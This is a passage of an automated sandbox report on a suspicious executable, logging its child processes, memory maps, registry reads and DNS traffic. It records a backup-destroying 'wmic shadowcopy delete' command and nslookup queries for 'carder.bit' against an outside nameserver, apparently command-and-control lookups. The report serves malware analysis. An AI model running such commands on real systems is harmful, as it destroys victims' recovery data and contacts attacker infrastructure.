Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\nslookup.exe base_address = 0x400000 True 1
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-05-29 01:42:14 (UTC) True 1
Fn
Get Time type = Ticks, time = 246543 True 1
Fn
Network Behavior
DNS (2)
»
Operation Additional Information Success Count Logfile
Get Hostname name_out = YKyd69q True 1
Fn
Resolve Name host = ns1.wowservers.ru, address_out = 221.120.220.72, 197.254.118.42, 190.35.242.126, 81.4.163.122 True 1
Fn
UDP Sessions (3)
»
Information Value
Total Data Sent 101 bytes
Total Data Received 886 bytes
Contacted Host Count 1
Contacted Hosts 221.120.220.72:53
UDP Session #1
»
Information Value
Handle 0x150
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 221.120.220.72
Remote Port 53
Local Address -
Local Port -
Data Sent 45 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 221.120.220.72, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 45, size_out = 45 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #2
»
Information Value
Handle 0x150
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 221.120.220.72
Remote Port 53
Local Address -
Local Port -
Data Sent 28 bytes
Data Received 188 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 221.120.220.72, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 188 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #3
»
Information Value
Handle 0x150
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 221.120.220.72
Remote Port 53
Local Address -
Local Port -
Data Sent 28 bytes
Data Received 698 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 221.120.220.72, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 698 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
Process #5: nslookup.exe
10 16
»
Information Value
ID #5
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup carder.bit ns1.wowservers.ru
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:04:10, Reason: Child Process
Unmonitor End Time: 00:04:55, Reason: Terminated by Timeout
Monitor Duration 00:00:45
OS Process Information
»
Information Value
PID 0xbd0
Parent PID 0x870 (c:\users\public\rt0fv0ph.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 7B8
0x 4E0
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
nslookup.exe.mui 0x000f0000 0x000f4fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False -
private_0x0000000000180000 0x00180000 0x001bffff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory Readable, Writable True False False -
private_0x00000000002a0000 0x002a0000 0x002dffff Private Memory Readable, Writable True False False -
private_0x00000000002e0000 0x002e0000 0x0037ffff Private Memory Readable, Writable True False False -
nslookup.exe 0x00390000 0x003adfff Memory Mapped File Readable, Writable, Executable True False False -
private_0x00000000003b0000 0x003b0000 0x004bffff Private Memory Readable, Writable True False False -
private_0x0000000000460000 0x00460000 0x0049ffff Private Memory Readable, Writable True False False -
private_0x00000000004b0000 0x004b0000 0x004bffff Private Memory Readable, Writable True False False -
private_0x0000000000510000 0x00510000 0x0051ffff Private Memory Readable, Writable True False False -
private_0x0000000000560000 0x00560000 0x005dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000005e0000 0x005e0000 0x00767fff Pagefile Backed Memory Readable True False False -
private_0x0000000000790000 0x00790000 0x0088ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000890000 0x00890000 0x00a10fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000a20000 0x00a20000 0x01e1ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001e20000 0x01e20000 0x01f1ffff Private Memory Readable, Writable True False False -
private_0x0000000001f80000 0x01f80000 0x01fbffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x01fc0000 0x0228efff Memory Mapped File Readable False False False -
private_0x0000000002290000 0x02290000 0x0247ffff Private Memory Readable, Writable True False False -
wsock32.dll 0x743d0000 0x743d6fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x74630000 0x74667fff Memory Mapped File Readable, Writable, Executable False False False -
wship6.dll 0x74670000 0x74675fff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x74680000 0x74684fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x74690000 0x74697fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x746a0000 0x746dbfff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x746e0000 0x746f1fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x74700000 0x7470ffff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x74710000 0x74715fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x74a40000 0x74a4ffff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x74a90000 0x74a96fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74aa0000 0x74abbfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74ac0000 0x74b03fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x751d0000 0x75204fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76890000 0x76895fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
Registry (7)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\nslookup.exe base_address = 0x390000 True 1
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-05-29 01:42:42 (UTC) True 1
Fn
Get Time type = Ticks, time = 274390 True 1
Fn
Network Behavior
DNS (2)
»
Operation Additional Information Success Count Logfile
Get Hostname name_out = YKyd69q True 1
Fn
Resolve Name host = ns1.wowservers.ru, address_out = 221.120.220.72, 197.254.118.42, 190.35.242.126, 81.4.163.122 True 1
Fn
UDP Sessions (3)
»
Information Value
Total Data Sent 101 bytes
Total Data Received 886 bytes
Contacted Host Count 1
Contacted Hosts 221.120.220.72:53
UDP Session #1
»
Information Value
Handle 0x150
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 221.120.220.72
Remote Port 53
Local Address -
Local Port -
Data Sent 45 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 221.120.220.72, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 45, size_out = 45 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #2
»
Information Value
Handle 0x150
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 221.120.220.72
Remote Port 53
Local Address -
Local Port -
Data Sent 28 bytes
Data Received 188 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 221.120.220.72, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 188 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #3
»
Information Value
Handle 0x150
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 221.120.220.72
Remote Port 53
Local Address -
Local Port -
Data Sent 28 bytes
Data Received 698 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 221.120.220.72, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 698 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
Process #6: nslookup.exe
10 16
»
Information Value
ID #6
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup carder.bit ns1.wowservers.ru
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:04:42, Reason: Child Process
Unmonitor End Time: 00:04:55, Reason: Terminated by Timeout
Monitor Duration 00:00:13
OS Process Information
»
Information Value
PID 0x48c
Parent PID 0x870 (c:\users\public\rt0fv0ph.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 934
0x 180
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x0003ffff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000a0000 0x000a0000 0x000a0fff Pagefile Backed Memory Readable True False False -
locale.nls 0x000b0000 0x00116fff Memory Mapped File Readable False False False -
pagefile_0x0000000000120000 0x00120000 0x00126fff Pagefile Backed Memory Readable True False False -
private_0x0000000000130000 0x00130000 0x0016ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000170000 0x00170000 0x00171fff Pagefile Backed Memory Readable, Writable True False False -
nslookup.exe.mui 0x00180000 0x00184fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000190000 0x00190000 0x00190fff Private Memory Readable, Writable True False False -
private_0x00000000001a0000 0x001a0000 0x001a0fff Private Memory Readable, Writable True False False -
private_0x00000000001b0000 0x001b0000 0x001effff Private Memory Readable, Writable True False False -
private_0x0000000000200000 0x00200000 0x0027ffff Private Memory Readable, Writable True False False -
private_0x00000000002a0000 0x002a0000 0x002dffff Private Memory Readable, Writable True False False -
private_0x0000000000310000 0x00310000 0x0040ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000410000 0x00410000 0x00597fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000005a0000 0x005a0000 0x00720fff Pagefile Backed Memory Readable True False False -
private_0x00000000007c0000 0x007c0000 0x007fffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x00800000 0x00acefff Memory Mapped File Readable False False False -
nslookup.exe 0x00b20000 0x00b3dfff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000b40000 0x00b40000 0x01f3ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001f40000 0x01f40000 0x0202ffff Private Memory Readable, Writable True False False -
private_0x0000000001f40000 0x01f40000 0x0200ffff Private Memory Readable, Writable True False False -
private_0x0000000002020000 0x02020000 0x0202ffff Private Memory Readable, Writable True False False -
private_0x0000000002030000 0x02030000 0x0213ffff Private Memory Readable, Writable True False False -
private_0x0000000002030000 0x02030000 0x0212ffff Private Memory Readable, Writable True False False -
private_0x0000000002130000 0x02130000 0x0213ffff Private Memory Readable, Writable True False False -
wsock32.dll 0x743c0000 0x743c6fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x74630000 0x74667fff Memory Mapped File Readable, Writable, Executable False False False -
wship6.dll 0x74670000 0x74675fff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x74680000 0x74684fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x74690000 0x74697fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x746a0000 0x746dbfff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x746e0000 0x746f1fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x74700000 0x7470ffff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x74710000 0x74715fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x74a40000 0x74a4ffff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x74a90000 0x74a96fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74aa0000 0x74abbfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74ac0000 0x74b03fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x751d0000 0x75204fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76890000 0x76895fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
Registry (7)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\nslookup.exe base_address = 0xb20000 True 1
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-05-29 01:43:14 (UTC) True 1
Fn
Get Time type = Ticks, time = 306557 True 1
Fn
Network Behavior
DNS (2)
»
Operation Additional Information Success Count Logfile
Get Hostname name_out = YKyd69q True 1
Fn
Resolve Name host = ns1.wowservers.ru, address_out = 221.120.220.72, 197.254.118.42, 190.35.242.126, 81.4.163.122 True 1
Fn
UDP Sessions (3)
»
Information Value
Total Data Sent 101 bytes
Total Data Received 886 bytes
Contacted Host Count 1
Contacted Hosts 221.120.220.72:53
UDP Session #1
»
Information Value
Handle 0x150
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 221.120.220.72
Remote Port 53
Local Address -
Local Port -
Data Sent 45 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 221.120.220.72, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 45, size_out = 45 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #2
»
Information Value
Handle 0x150
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 221.120.220.72
Remote Port 53
Local Address -
Local Port -
Data Sent 28 bytes
Data Received 188 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 221.120.220.72, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 188 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #3
»
Information Value
Handle 0x150
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 221.120.220.72
Remote Port 53
Local Address -
Local Port -
Data Sent 28 bytes
Data Received 698 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 221.120.220.72, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 698 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
Process #7: wmic.exe
20 0
»
Information Value
ID #7
File Name c:\windows\syswow64\wbem\wmic.exe
Command Line "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:04:47, Reason: Child Process
Unmonitor End Time: 00:04:55, Reason: Terminated by Timeout
Monitor Duration 00:00:08
OS Process Information
»
Information Value
PID 0x20c
Parent PID 0x870 (c:\users\public\rt0fv0ph.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 2AC
0x B84
0x 7F8
0x 75C
0x 340
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False -
wmic.exe.mui 0x00080000 0x0008ffff Memory Mapped File Readable, Writable False False False -
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable True False False -
private_0x00000000000a0000 0x000a0000 0x000a0fff Private Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x000effff Private Memory Readable, Writable True False False -
locale.nls 0x000f0000 0x00156fff Memory Mapped File Readable False False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000170000 0x00170000 0x00170fff Pagefile Backed Memory Readable True False False -
msxml3r.dll 0x00180000 0x00180fff Memory Mapped File Readable False False False -
private_0x0000000000190000 0x00190000 0x001affff Private Memory - True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b1fff Pagefile Backed Memory Readable True False False -
private_0x00000000001c0000 0x001c0000 0x001fffff Private Memory Readable, Writable True False False -
private_0x0000000000200000 0x00200000 0x0025ffff Private Memory Readable, Writable True False False -
windowsshell.manifest 0x00200000 0x00200fff Memory Mapped File Readable False False False -
pagefile_0x0000000000200000 0x00200000 0x00200fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000210000 0x00210000 0x00211fff Pagefile Backed Memory Readable True False False -
private_0x0000000000220000 0x00220000 0x0025ffff Private Memory Readable, Writable True False False -
index.dat 0x00260000 0x0026bfff Memory Mapped File Readable, Writable True False False -
index.dat 0x00270000 0x00277fff Memory Mapped File Readable, Writable True False False -
index.dat 0x00280000 0x0028bfff Memory Mapped File Readable, Writable True False False -
rsaenh.dll 0x00290000 0x002cbfff Memory Mapped File Readable False False False -
pagefile_0x0000000000290000 0x00290000 0x0029cfff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000002d0000 0x002d0000 0x0030ffff Private Memory Readable, Writable True False False -
wmic.exe 0x00310000 0x00372fff Memory Mapped File Readable, Writable, Executable True False False -
private_0x00000000003b0000 0x003b0000 0x003effff Private Memory Readable, Writable True False False -
private_0x0000000000420000 0x00420000 0x0049ffff Private Memory Readable, Writable True False False -
private_0x00000000004e0000 0x004e0000 0x0051ffff Private Memory Readable, Writable True False False -
private_0x0000000000540000 0x00540000 0x0063ffff Private Memory Readable, Writable True False False -
private_0x0000000000640000 0x00640000 0x0072ffff Private Memory Readable, Writable True False False -
private_0x0000000000670000 0x00670000 0x006affff Private Memory Readable, Writable True False False -
private_0x00000000006b0000 0x006b0000 0x006effff Private Memory Readable, Writable True False False -
private_0x00000000006f0000 0x006f0000 0x0072ffff Private Memory Readable, Writable True False False -
